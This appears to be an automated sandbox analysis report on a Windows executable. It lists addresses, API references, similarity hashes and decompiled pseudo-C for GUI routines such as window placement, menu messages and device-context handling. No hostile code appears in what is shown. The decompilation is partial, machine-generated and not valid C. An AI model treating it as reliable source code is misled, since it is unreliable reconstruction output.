0x0046c457
0x0046c460
0x0046c465
0x0046c467
0x00000000
0x0046c469
0x0046c46c
0x0046c46c
0x0046c467
0x0046c455
0x0046bd83
0x0046bd83
0x0046bd89
0x0046bdb2
0x0046bdb2
0x0046bdb8
0x0046c59e
0x0046c5a0
0x0046c5a2
0x0046c5aa
0x0046c5b8
0x0046c5bd
0x0046c5c0
0x0046c5c7
0x0046c5e0
0x0046c5c9
0x0046c5cb
0x0046c5cb
0x0046c5c7
0x0046bdbe
0x0046bdbe
0x0046bdbe
0x0046bdc1
0x0046c364
0x0046c37f
0x0046bdc7
0x0046bdc7
0x0046bdc8
0x0046c4a7
0x0046c4aa
0x0046c4b1
0x0046c4ba
0x0046c4c3
0x0046c4ca
0x0046c4cd
0x0046c4d0
0x0046c4e5
0x0046c4e8
0x0046c4f7
0x0046c4f7
0x0046c4d2
0x0046c4db
0x0046c4db
0x0046c4d0
0x0046c4b1
0x0046bdc8
0x0046bdc1
0x0046bd8b
0x0046bd8b
0x0046c38d
0x0046c392
0x0046c397
0x0046c399
0x0046c3b8
0x0046c3bb
0x0046c39b
0x0046c3a1
0x0046c3af
0x0046c3b4
0x0046c3b6
0x00000000
0x00000000
0x0046c3b6
0x0046c3c2
0x0046c3c5
0x0046c3c9
0x0046c3dc
0x0046c3e1
0x0046c3f2
0x0046c40e
0x0046c40e
0x0046bd91
0x0046bd91
0x0046bd97
0x0046c537
0x0046c53a
0x0046c53f
0x0046c545
0x0046c549
0x0046c578
0x0046c586
0x0046c54b
0x0046c54b
0x0046c551
0x0046c561
0x0046c568
0x0046c568
0x0046bd9d
0x0046bd9d
0x0046bd9e
0x0046c501
0x0046c50d
0x0046c51b
0x0046c520
0x0046c522
0x0046c52b
0x0046c52b
0x0046bda4
0x0046bda7
0x0046c425
0x0046c425
0x0046bda7
0x0046bd9e
0x0046bd97
0x0046bd8b
0x0046bd89
0x0046c753
0x0046c755
0x0046c758
0x0046c75b
0x0046c76b
0x0046c76b

APIs

GetWindowLongA.USER32 ref: 0046C3EA
SetWindowLongA.USER32 ref: 0046C40E

Strings

, xrefs: 0046C67D

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-3916222277
Opcode ID: c677cf18c3e0dc4dfec1929f7c71797fd687ed6bdd41ed4038f2e185a06fb592
Instruction ID: 1d737c51cf3469ba57ef148d93f1cdd57b72d16844a5970be95aefea3b468b88
Opcode Fuzzy Hash: c677cf18c3e0dc4dfec1929f7c71797fd687ed6bdd41ed4038f2e185a06fb592
Instruction Fuzzy Hash: 8A624034A00205DFCB00DF59C5C4AAEB7F1EF48314F6481A6E844AB366DB38AE45DF95

Uniqueness

Uniqueness Score: -1.00%

Function 0043C504, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0043C504(void* __eax) {
				void* _v28;
				struct _WINDOWPLACEMENT _v56;
				struct tagPOINT _v64;
				intOrPtr _v68;
				void* _t43;
				struct HWND__* _t45;
				struct tagPOINT* _t47;

				_t47 =  &(_v64.y);
				_t43 = __eax;
				if(IsIconic( *(__eax + 0x180)) == 0) {
					GetWindowRect( *(_t43 + 0x180), _t47);
				} else {
					_v56.length = 0x2c;
					GetWindowPlacement( *(_t43 + 0x180),  &_v56);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if((GetWindowLongA( *(_t43 + 0x180), 0xfffffff0) & 0x40000000) != 0) {
					_t45 = GetWindowLongA( *(_t43 + 0x180), 0xfffffff8);
					if(_t45 != 0) {
						ScreenToClient(_t45, _t47);
						ScreenToClient(_t45,  &_v64);
					}
				}
				 *(_t43 + 0x40) = _t47->x;
				 *((intOrPtr*)(_t43 + 0x44)) = _v68;
				 *((intOrPtr*)(_t43 + 0x48)) = _v64.x - _t47->x;
				 *((intOrPtr*)(_t43 + 0x4c)) = _v64.y.x - _v68;
				return E004351C8(_t43);
			}

0x0043c507
0x0043c50a
0x0043c51a
0x0043c549
0x0043c51c
0x0043c51c
0x0043c530
0x0043c53b
0x0043c53c
0x0043c53d
0x0043c53e
0x0043c53e
0x0043c561
0x0043c571
0x0043c575
0x0043c579
0x0043c584
0x0043c584
0x0043c575
0x0043c58c
0x0043c593
0x0043c59d
0x0043c5a8
0x0043c5b8

APIs

IsIconic.USER32 ref: 0043C513
GetWindowPlacement.USER32(?,0000002C), ref: 0043C530
GetWindowRect.USER32 ref: 0043C549
GetWindowLongA.USER32 ref: 0043C557
GetWindowLongA.USER32 ref: 0043C56C
ScreenToClient.USER32 ref: 0043C579
ScreenToClient.USER32 ref: 0043C584

Strings

,, xrefs: 0043C51C

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ClientLongScreen$IconicPlacementRect
String ID: ,
API String ID: 2266315723-3772416878
Opcode ID: d3978e29b4011b20706598392c25bbde71e925f744e67a7bf9976fb6df8bed74
Instruction ID: 813972987c9af47017c6e8c0ff2830ba60c29583813e2a484c0d43f261c6bbd2
Opcode Fuzzy Hash: d3978e29b4011b20706598392c25bbde71e925f744e67a7bf9976fb6df8bed74
Instruction Fuzzy Hash: 4D117F71504211ABCB01DF6DC885A9B77D8AF0D314F14462EFE58EB386D739E9048BA6

Uniqueness

Uniqueness Score: -1.00%

Function 004493A0, Relevance: 10.9, APIs: 7, Instructions: 405
nativeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E004493A0(intOrPtr __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				struct HMENU__* _v12;
				signed int _v16;
				char _v17;
				intOrPtr _v24;
				int _v28;
				struct HDC__* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr* _v48;
				char _v52;
				intOrPtr _t137;
				signed int _t138;
				intOrPtr _t144;
				signed int _t150;
				signed int _t151;
				intOrPtr* _t153;
				void* _t158;
				struct HMENU__* _t160;
				intOrPtr* _t165;
				void* _t173;
				signed int _t177;
				signed int _t181;
				void* _t182;
				void* _t214;
				struct HDC__* _t221;
				void* _t251;
				signed int _t257;
				void* _t265;
				signed int _t271;
				signed int _t272;
				signed int _t274;
				signed int _t275;
				signed int _t277;
				signed int _t278;
				signed int _t280;
				signed int _t281;
				signed int _t283;
				signed int _t284;
				signed int _t286;
				signed int _t287;
				signed int _t290;
				signed int _t291;
				intOrPtr _t307;
				intOrPtr _t311;
				intOrPtr _t333;
				intOrPtr _t342;
				intOrPtr _t346;
				intOrPtr* _t353;
				signed int _t355;
				intOrPtr* _t356;
				signed int _t367;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				intOrPtr* _t375;
				void* _t377;
				void* _t378;
				intOrPtr _t379;
				void* _t380;

				_t377 = _t378;
				_t379 = _t378 + 0xffffffd0;
				_v52 = 0;
				_t375 = __edx;
				_v8 = __eax;
				_push(_t377);
				_push(0x4498d3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t379;
				_t137 =  *__edx;
				_t380 = _t137 - 0x111;
				if(_t380 > 0) {
					_t138 = _t137 - 0x117;
					__eflags = _t138;
					if(_t138 == 0) {
						_t271 =  *((intOrPtr*)(_v8 + 8)) - 1;
						__eflags = _t271;
						if(_t271 < 0) {
							goto L67;
						} else {
							_t272 = _t271 + 1;
							_t367 = 0;
							__eflags = 0;
							while(1) {
								_t150 = E0044874C(E004141BC(_v8, _t367),  *(_t375 + 4), __eflags);
								__eflags = _t150;
								if(_t150 != 0) {
									goto L68;
								}
								_t367 = _t367 + 1;
								_t272 = _t272 - 1;
								__eflags = _t272;
								if(_t272 != 0) {
									continue;
								} else {
									goto L67;
								}
								goto L68;
							}
						}
					} else {
						_t151 = _t138 - 8;
						__eflags = _t151;
						if(_t151 == 0) {
							_v17 = 0;
							__eflags =  *(__edx + 6) & 0x00000010;
							if(( *(__edx + 6) & 0x00000010) != 0) {
								_v17 = 1;
							}
							_t274 =  *((intOrPtr*)(_v8 + 8)) - 1;
							__eflags = _t274;
							if(__eflags < 0) {
								L32:
								_t153 =  *0x49111c; // 0x492c04
								E00455E34( *_t153, 0, __eflags);
								goto L67;
							} else {
								_t275 = _t274 + 1;
								_t368 = 0;
								__eflags = 0;
								while(1) {
									__eflags = _v17 - 1;
									if(_v17 != 1) {
										_v12 =  *(_t375 + 4) & 0x0000ffff;
									} else {
										_t160 =  *(_t375 + 8);
										__eflags = _t160;
										if(_t160 == 0) {
											_v12 = 0xffffffff;
										} else {
											_v12 = GetSubMenu(_t160,  *(_t375 + 4) & 0x0000ffff);
										}
									}
									_t158 = E004141BC(_v8, _t368);
									_t295 = _v17;
									_v16 = E00448690(_t158, _v17, _v12);
									__eflags = _v16;
									if(__eflags != 0) {
										break;
									}
									_t368 = _t368 + 1;
									_t275 = _t275 - 1;
									__eflags = _t275;
									if(__eflags != 0) {
										continue;
									} else {
										goto L32;
									}
									goto L68;
								}
								E00432CEC( *((intOrPtr*)(_v16 + 0x58)), _t295,  &_v52, __eflags);
								_t165 =  *0x49111c; // 0x492c04
								E00455E34( *_t165, _v52, __eflags);
							}
						} else {
							__eflags = _t151 == 1;
							if(_t151 == 1) {
								_t277 =  *((intOrPtr*)(_v8 + 8)) - 1;
								__eflags = _t277;
								if(_t277 < 0) {
									goto L67;
								} else {
									_t278 = _t277 + 1;
									_t369 = 0;
									__eflags = 0;
									while(1) {
										_v48 = E004141BC(_v8, _t369);
										_t173 =  *((intOrPtr*)( *_v48 + 0x34))();
										__eflags = _t173 -  *(_t375 + 8);
										if(_t173 ==  *(_t375 + 8)) {
											break;
										}
										_t177 = E00448690(_v48, 1,  *(_t375 + 8));
										__eflags = _t177;
										if(_t177 == 0) {
											_t369 = _t369 + 1;
											_t278 = _t278 - 1;
											__eflags = _t278;
											if(_t278 != 0) {
												continue;
											} else {
												goto L67;
											}
										} else {
											break;
										}
										goto L68;
									}
									E00448F90(_v48, _t375);
								}
							} else {
								goto L67;
							}
						}
					}
					goto L68;
				} else {
					if(_t380 == 0) {
						_t280 =  *((intOrPtr*)(_v8 + 8)) - 1;
						__eflags = _t280;
						if(_t280 < 0) {
							goto L67;
						} else {
							_t281 = _t280 + 1;
							_t370 = 0;
							__eflags = 0;
							while(1) {
								E004141BC(_v8, _t370);
								_t181 = E00448730( *(_t375 + 4), __eflags);
								__eflags = _t181;
								if(_t181 != 0) {
									goto L68;
								}
								_t370 = _t370 + 1;
								_t281 = _t281 - 1;
								__eflags = _t281;
								if(_t281 != 0) {
									continue;
								} else {
									goto L67;
								}
								goto L68;
							}
						}
						goto L68;
					} else {
						_t182 = _t137 - 0x2b;
						if(_t182 == 0) {
							_v40 =  *((intOrPtr*)(__edx + 8));
							_t283 =  *((intOrPtr*)(_v8 + 8)) - 1;
							__eflags = _t283;
							if(_t283 < 0) {
								goto L67;
							} else {
								_t284 = _t283 + 1;
								_t371 = 0;
								__eflags = 0;
								while(1) {
									_v16 = E00448690(E004141BC(_v8, _t371), 0,  *((intOrPtr*)(_v40 + 8)));
									__eflags = _v16;
									if(_v16 != 0) {
										break;
									}
									_t371 = _t371 + 1;
									_t284 = _t284 - 1;
									__eflags = _t284;
									if(_t284 != 0) {
										continue;
									} else {
										goto L67;
									}
									goto L69;
								}
								_v24 = E0041FD3C(0, 1);
								_push(_t377);
								_push(0x449706);
								_push( *[fs:eax]);
								 *[fs:eax] = _t379;
								_v28 = SaveDC( *(_v40 + 0x18));
								_push(_t377);
								_push(0x4496e9);
								_push( *[fs:eax]);
								 *[fs:eax] = _t379;
								E00420784(_v24,  *(_v40 + 0x18));
								E00420600(_v24);
								E00449B78(_v16, _v40 + 0x1c, _v24,  *((intOrPtr*)(_v40 + 0x10)));
								_pop(_t333);
								 *[fs:eax] = _t333;
								_push(0x4496f0);
								__eflags = 0;
								E00420784(_v24, 0);
								return RestoreDC( *(_v40 + 0x18), _v28);
							}
						} else {
							_t214 = _t182 - 1;
							if(_t214 == 0) {
								_v44 =  *((intOrPtr*)(__edx + 8));
								_t286 =  *((intOrPtr*)(_v8 + 8)) - 1;
								__eflags = _t286;
								if(_t286 < 0) {
									goto L67;
								} else {
									_t287 = _t286 + 1;
									_t372 = 0;
									__eflags = 0;
									while(1) {
										_v16 = E00448690(E004141BC(_v8, _t372), 0,  *((intOrPtr*)(_v44 + 8)));
										__eflags = _v16;
										if(_v16 != 0) {
											break;
										}
										_t372 = _t372 + 1;
										_t287 = _t287 - 1;
										__eflags = _t287;
										if(_t287 != 0) {
											continue;
										} else {
											goto L67;
										}
										goto L69;
									}
									_t221 =  *((intOrPtr*)(_v8 + 0x10));
									L00406FB4();
									_v32 = _t221;
									 *[fs:eax] = _t379;
									_v24 = E0041FD3C(0, 1);
									 *[fs:eax] = _t379;
									_v28 = SaveDC(_v32);
									 *[fs:eax] = _t379;
									E00420784(_v24, _v32);
									E00420600(_v24);
									 *((intOrPtr*)( *_v16 + 0x38))(_v44 + 0x10,  *[fs:eax], 0x449807, _t377,  *[fs:eax], 0x449824, _t377,  *[fs:eax], 0x449849, _t377, _t221);
									_pop(_t342);
									 *[fs:eax] = _t342;
									_push(0x44980e);
									__eflags = 0;
									E00420784(_v24, 0);
									return RestoreDC(_v32, _v28);
								}
							} else {
								if(_t214 == 0x27) {
									_v36 =  *((intOrPtr*)(__edx + 8));
									_t290 =  *((intOrPtr*)(_v8 + 8)) - 1;
									__eflags = _t290;
									if(_t290 < 0) {
										goto L67;
									} else {
										_t291 = _t290 + 1;
										_t373 = 0;
										__eflags = 0;
										while(1) {
											_t251 =  *((intOrPtr*)( *((intOrPtr*)(E004141BC(_v8, _t373))) + 0x34))();
											_t346 = _v36;
											__eflags = _t251 -  *((intOrPtr*)(_t346 + 0xc));
											if(_t251 !=  *((intOrPtr*)(_t346 + 0xc))) {
												_v16 = E00448690(E004141BC(_v8, _t373), 1,  *((intOrPtr*)(_v36 + 0xc)));
											} else {
												_v16 =  *((intOrPtr*)(E004141BC(_v8, _t373) + 0x34));
											}
											__eflags = _v16;
											if(_v16 != 0) {
												break;
											}
											_t373 = _t373 + 1;
											_t291 = _t291 - 1;
											__eflags = _t291;
											if(_t291 != 0) {
												continue;
											} else {
												goto L67;
											}
											goto L68;
										}
										_t257 = E004486C0(E004141BC(_v8, _t373), 1,  *((intOrPtr*)(_v36 + 8)));
										__eflags = _t257;
										if(_t257 == 0) {
											_t265 = E004141BC(_v8, _t373);
											__eflags = 0;
											_t257 = E004486C0(_t265, 0,  *((intOrPtr*)(_v36 + 0xc)));
										}
										_t353 =  *0x491278; // 0x492c08
										_t355 =  *( *_t353 + 0x6c);
										__eflags = _t355;
										if(_t355 != 0) {
											__eflags = _t257;
											if(_t257 == 0) {
												_t257 =  *(_t355 + 0x158);
											}
											_t307 =  *0x491278; // 0x492c08
											__eflags =  *(_t355 + 0x228) & 0x00000008;
											if(( *(_t355 + 0x228) & 0x00000008) == 0) {
												_t356 =  *0x49111c; // 0x492c04
												E00455AD0( *_t356, _t291, _t307, _t257, _t373, _t375);
											} else {
												E00455B38();
											}
										}
									}
								} else {
									L67:
									_push( *(_t375 + 8));
									_push( *(_t375 + 4));
									_push( *_t375);
									_t144 =  *((intOrPtr*)(_v8 + 0x10));
									_push(_t144);
									L00406D8C();
									 *((intOrPtr*)(_t375 + 0xc)) = _t144;
								}
								L68:
								_pop(_t311);
								 *[fs:eax] = _t311;
								_push(0x4498da);
								return E00404348( &_v52);
							}
						}
					}
				}
				L69:
			}

0x004493a1
0x004493a3
0x004493ab
0x004493ae
0x004493b0
0x004493b5
0x004493b6
0x004493bb
0x004493be
0x004493c1
0x004493c3
0x004493c8
0x004493ea
0x004493ea
0x004493ef
0x0044943e
0x0044943f
0x00449441
0x00000000
0x00449447
0x00449447
0x00449448
0x00449448
0x0044944a
0x00449457
0x0044945c
0x0044945e
0x00000000
0x00000000
0x00449464
0x00449465
0x00449465
0x00449466
0x00000000
0x00449468
0x00000000
0x00449468
0x00000000
0x00449466
0x0044944a
0x004493f1
0x004493f1
0x004493f1
0x004493f4
0x0044946d
0x00449471
0x00449475
0x00449477
0x00449477
0x00449481
0x00449482
0x00449484
0x004494fa
0x004494fa
0x00449503
0x00000000
0x00449486
0x00449486
0x00449487
0x00449487
0x00449489
0x00449489
0x0044948d
0x004494b3
0x0044948f
0x0044948f
0x00449492
0x00449494
0x004494a6
0x00449496
0x004494a1
0x004494a1
0x00449494
0x004494bb
0x004494c0
0x004494cb
0x004494ce
0x004494d2
0x00000000
0x00000000
0x004494f6
0x004494f7
0x004494f7
0x004494f8
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004494f8
0x004494dd
0x004494e5
0x004494ec
0x004494ec
0x004493f6
0x004493f6
0x004493f7
0x00449860
0x00449861
0x00449863
0x00000000
0x00449865
0x00449865
0x00449866
0x00449866
0x00449868
0x00449872
0x0044987a
0x0044987d
0x00449880
0x00000000
0x00000000
0x0044988a
0x0044988f
0x00449891
0x0044989f
0x004498a0
0x004498a0
0x004498a1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00449891
0x00449898
0x00449898
0x004493fd
0x00000000
0x004493fd
0x004493f7
0x004493f4
0x00000000
0x004493ca
0x004493ca
0x00449408
0x00449409
0x0044940b
0x00000000
0x00449411
0x00449411
0x00449412
0x00449412
0x00449414
0x00449419
0x00449422
0x00449427
0x00449429
0x00000000
0x00000000
0x0044942f
0x00449430
0x00449430
0x00449431
0x00000000
0x00449433
0x00000000
0x00449433
0x00000000
0x00449431
0x00449414
0x00000000
0x004493cc
0x004493cc
0x004493cf
0x00449612
0x0044961b
0x0044961c
0x0044961e
0x00000000
0x00449624
0x00449624
0x00449625
0x00449625
0x00449627
0x0044963e
0x00449641
0x00449645
0x00000000
0x00000000
0x0044970d
0x0044970e
0x0044970e
0x0044970f
0x00000000
0x00449715
0x00000000
0x00449715
0x00000000
0x0044970f
0x00449657
0x0044965c
0x0044965d
0x00449662
0x00449665
0x00449674
0x00449679
0x0044967a
0x0044967f
0x00449682
0x0044968e
0x004496a3
0x004496bc
0x004496c3
0x004496c6
0x004496c9
0x004496ce
0x004496d3
0x004496e8
0x004496e8
0x004493d5
0x004493d5
0x004493d6
0x0044971d
0x00449726
0x00449727
0x00449729
0x00000000
0x0044972f
0x0044972f
0x00449730
0x00449730
0x00449732
0x00449749
0x0044974c
0x00449750
0x00000000
0x00000000
0x00449850
0x00449851
0x00449851
0x00449852
0x00000000
0x00449858
0x00000000
0x00449858
0x00000000
0x00449852
0x00449759
0x0044975d
0x00449762
0x00449770
0x0044977f
0x0044978d
0x00449799
0x004497a7
0x004497b0
0x004497c5
0x004497df
0x004497e4
0x004497e7
0x004497ea
0x004497ef
0x004497f4
0x00449806
0x00449806
0x004493dc
0x004493df
0x00449510
0x00449519
0x0044951a
0x0044951c
0x00000000
0x00449522
0x00449522
0x00449523
0x00449523
0x00449525
0x00449531
0x00449534
0x00449537
0x0044953a
0x00449565
0x0044953c
0x00449549
0x00449549
0x00449568
0x0044956c
0x00000000
0x00000000
0x00449602
0x00449603
0x00449603
0x00449604
0x00000000
0x0044960a
0x00000000
0x0044960a
0x00000000
0x00449604
0x00449584
0x00449589
0x0044958b
0x00449592
0x0044959d
0x0044959f
0x0044959f
0x004495a4
0x004495ac
0x004495af
0x004495b1
0x004495b7
0x004495b9
0x004495c0
0x004495c0
0x004495c6
0x004495cc
0x004495d3
0x004495ef
0x004495f8
0x004495d5
0x004495e5
0x004495e5
0x004495d3
0x004495b1
0x004493e5
0x004498a3
0x004498a6
0x004498aa
0x004498ad
0x004498b1
0x004498b4
0x004498b5
0x004498ba
0x004498ba
0x004498bd
0x004498bf
0x004498c2
0x004498c5
0x004498d2
0x004498d2
0x004493d6
0x004493cf
0x004493ca
0x00000000

APIs

SaveDC.GDI32(?), ref: 0044966F
RestoreDC.GDI32(?,?), ref: 004496E3
72E7B080.USER32(?,00000000,004498D3), ref: 0044975D
SaveDC.GDI32(?), ref: 00449794
RestoreDC.GDI32(?,?), ref: 00449801
NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004498D3), ref: 004498B5

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: RestoreSave$B080NtdllProc_Window
String ID:
API String ID: 4024241980-0
Opcode ID: e6e53c3d7a4c52929fda6793c6f02bbbd30709ea8a32b9ac3a081f968d9be338
Instruction ID: 680f96552edb3fc9ed79ab1739da43706b8bfa7b11bc6686d55fcc6422e640b4
Opcode Fuzzy Hash: e6e53c3d7a4c52929fda6793c6f02bbbd30709ea8a32b9ac3a081f968d9be338
Instruction Fuzzy Hash: DAE15D74A042059FEB10EFAAC88199FF3F5FF89304B2585AAE411A7361D738ED41DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0044EEA4, Relevance: 9.3, APIs: 6, Instructions: 284
windowCOMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E0044EEA4(intOrPtr __eax, intOrPtr* __edx) {
				intOrPtr _v8;
				int _v12;
				intOrPtr _v16;
				struct HDC__* _v20;
				intOrPtr* _v24;
				void* __ebp;
				intOrPtr _t92;
				struct HWND__* _t93;
				struct HWND__* _t96;
				intOrPtr _t116;
				intOrPtr _t119;
				struct HWND__* _t125;
				struct HWND__* _t128;
				intOrPtr _t132;
				intOrPtr _t133;
				intOrPtr _t135;
				intOrPtr _t136;
				struct HWND__* _t138;
				struct HWND__* _t141;
				void* _t145;
				intOrPtr _t148;
				intOrPtr _t179;
				struct HDC__* _t184;
				intOrPtr* _t207;
				intOrPtr _t232;
				intOrPtr _t238;
				intOrPtr _t245;
				struct HWND__* _t249;
				struct HWND__* _t250;
				struct HWND__* _t255;
				intOrPtr* _t256;
				void* _t258;
				void* _t260;
				intOrPtr _t261;
				void* _t263;
				void* _t267;

				_t258 = _t260;
				_t261 = _t260 + 0xffffffec;
				_t207 = __edx;
				_v8 = __eax;
				_t92 =  *__edx;
				_t263 = _t92 - 0x46;
				if(_t263 > 0) {
					_t93 = _t92 - 0xb01a;
					__eflags = _t93;
					if(_t93 == 0) {
						__eflags =  *(_v8 + 0xa0);
						if(__eflags != 0) {
							E004037D8(_v8, __eflags);
						}
					} else {
						__eflags = _t93 == 1;
						if(_t93 == 1) {
							__eflags =  *(_v8 + 0xa0);
							if(__eflags != 0) {
								E004037D8(_v8, __eflags);
							}
						} else {
							goto L41;
						}
					}
					goto L43;
				} else {
					if(_t263 == 0) {
						_t116 = _v8;
						_t232 =  *0x44f2d4; // 0x1
						__eflags = _t232 - ( *(_t116 + 0x1c) &  *0x44f2d0);
						if(_t232 == ( *(_t116 + 0x1c) &  *0x44f2d0)) {
							_t119 = _v8;
							__eflags =  *((intOrPtr*)(_t119 + 0x230)) - 0xffffffffffffffff;
							if( *((intOrPtr*)(_t119 + 0x230)) - 0xffffffffffffffff < 0) {
								_t132 = _v8;
								__eflags =  *((char*)(_t132 + 0x22b)) - 2;
								if( *((char*)(_t132 + 0x22b)) != 2) {
									_t133 =  *((intOrPtr*)(__edx + 8));
									_t26 = _t133 + 0x18;
									 *_t26 =  *(_t133 + 0x18) | 0x00000002;
									__eflags =  *_t26;
								}
							}
							_t125 =  *((intOrPtr*)(_v8 + 0x230)) - 1;
							__eflags = _t125;
							if(_t125 == 0) {
								L30:
								_t128 =  *((intOrPtr*)(_v8 + 0x229)) - 2;
								__eflags = _t128;
								if(_t128 == 0) {
									L32:
									 *( *((intOrPtr*)(_t207 + 8)) + 0x18) =  *( *((intOrPtr*)(_t207 + 8)) + 0x18) | 0x00000001;
								} else {
									__eflags = _t128 == 3;
									if(_t128 == 3) {
										goto L32;
									}
								}
							} else {
								__eflags = _t125 == 2;
								if(_t125 == 2) {
									goto L30;
								}
							}
						}
						goto L43;
					} else {
						_t96 = _t92 + 0xfffffffa - 3;
						if(_t96 < 0) {
							__eflags =  *0x476b48;
							if( *0x476b48 != 0) {
								__eflags =  *__edx - 7;
								if( *__edx != 7) {
									goto L43;
								} else {
									_t135 = _v8;
									__eflags =  *(_t135 + 0x1c) & 0x00000010;
									if(( *(_t135 + 0x1c) & 0x00000010) != 0) {
										goto L43;
									} else {
										_t255 = 0;
										_t136 = _v8;
										__eflags =  *((char*)(_t136 + 0x22f)) - 2;
										if( *((char*)(_t136 + 0x22f)) != 2) {
											_t138 =  *(_v8 + 0x220);
											__eflags = _t138;
											if(_t138 != 0) {
												__eflags = _t138 - _v8;
												if(_t138 != _v8) {
													_t255 = E0043C1F4(_t138);
												}
											}
										} else {
											_t141 = E0044F704(_v8);
											__eflags = _t141;
											if(_t141 != 0) {
												_t255 = E0043C1F4(E0044F704(_v8));
											}
										}
										__eflags = _t255;
										if(_t255 == 0) {
											goto L43;
										} else {
											_t96 = SetFocus(_t255);
										}
									}
								}
							}
							goto L44;
						} else {
							_t145 = _t96 - 0x22;
							if(_t145 == 0) {
								_v24 =  *((intOrPtr*)(__edx + 8));
								__eflags =  *_v24 - 1;
								if( *_v24 != 1) {
									goto L43;
								} else {
									_t148 = _v8;
									__eflags =  *(_t148 + 0x248);
									if( *(_t148 + 0x248) == 0) {
										goto L43;
									} else {
										_t249 = E00448690( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_v24 + 8)));
										__eflags = _t249;
										if(_t249 == 0) {
											goto L43;
										} else {
											_v16 = E0041FD3C(0, 1);
											_push(_t258);
											_push(0x44f11a);
											_push( *[fs:eax]);
											 *[fs:eax] = _t261;
											_v12 = SaveDC( *(_v24 + 0x18));
											_push(_t258);
											_push(0x44f0fd);
											_push( *[fs:eax]);
											 *[fs:eax] = _t261;
											E00420784(_v16,  *(_v24 + 0x18));
											E00420600(_v16);
											E00449B78(_t249, _v24 + 0x1c, _v16,  *((intOrPtr*)(_v24 + 0x10)));
											_pop(_t238);
											 *[fs:eax] = _t238;
											_push(0x44f104);
											__eflags = 0;
											E00420784(_v16, 0);
											return RestoreDC( *(_v24 + 0x18), _v12);
										}
									}
								}
							} else {
								if(_t145 == 1) {
									_t256 =  *((intOrPtr*)(__edx + 8));
									__eflags =  *_t256 - 1;
									if( *_t256 != 1) {
										goto L43;
									} else {
										_t179 = _v8;
										__eflags =  *(_t179 + 0x248);
										if( *(_t179 + 0x248) == 0) {
											goto L43;
										} else {
											_t250 = E00448690( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_t256 + 8)));
											__eflags = _t250;
											if(_t250 == 0) {
												goto L43;
											} else {
												_t184 = E0043C1F4(_v8);
												L00406FB4();
												_v20 = _t184;
												 *[fs:eax] = _t261;
												_v16 = E0041FD3C(0, 1);
												 *[fs:eax] = _t261;
												_v12 = SaveDC(_v20);
												 *[fs:eax] = _t261;
												E00420784(_v16, _v20);
												E00420600(_v16);
												 *((intOrPtr*)(_t250->i + 0x38))(_t256 + 0x10,  *[fs:eax], 0x44f204, _t258,  *[fs:eax], 0x44f221, _t258,  *[fs:eax], 0x44f248, _t258, _t184);
												_pop(_t245);
												 *[fs:eax] = _t245;
												_push(0x44f20b);
												__eflags = 0;
												E00420784(_v16, 0);
												return RestoreDC(_v20, _v12);
											}
										}
									}
								} else {
									L41:
									_t267 =  *_t207 -  *0x492c10; // 0xc075
									if(_t267 == 0) {
										E00436D28(_v8, 0, 0xb025, 0);
										E00436D28(_v8, 0, 0xb024, 0);
										E00436D28(_v8, 0, 0xb035, 0);
										E00436D28(_v8, 0, 0xb009, 0);
										E00436D28(_v8, 0, 0xb008, 0);
										E00436D28(_v8, 0, 0xb03d, 0);
									}
									L43:
									_t96 = E00439CA4(_v8, _t207);
									L44:
									return _t96;
								}
							}
						}
					}
				}
			}

0x0044eea5
0x0044eea7
0x0044eead
0x0044eeaf
0x0044eeb2
0x0044eeb4
0x0044eeb7
0x0044eedc
0x0044eedc
0x0044eee1
0x0044ef8d
0x0044ef94
0x0044efa1
0x0044efa1
0x0044eee7
0x0044eee7
0x0044eee8
0x0044ef6c
0x0044ef73
0x0044ef80
0x0044ef80
0x0044eeea
0x00000000
0x0044eeea
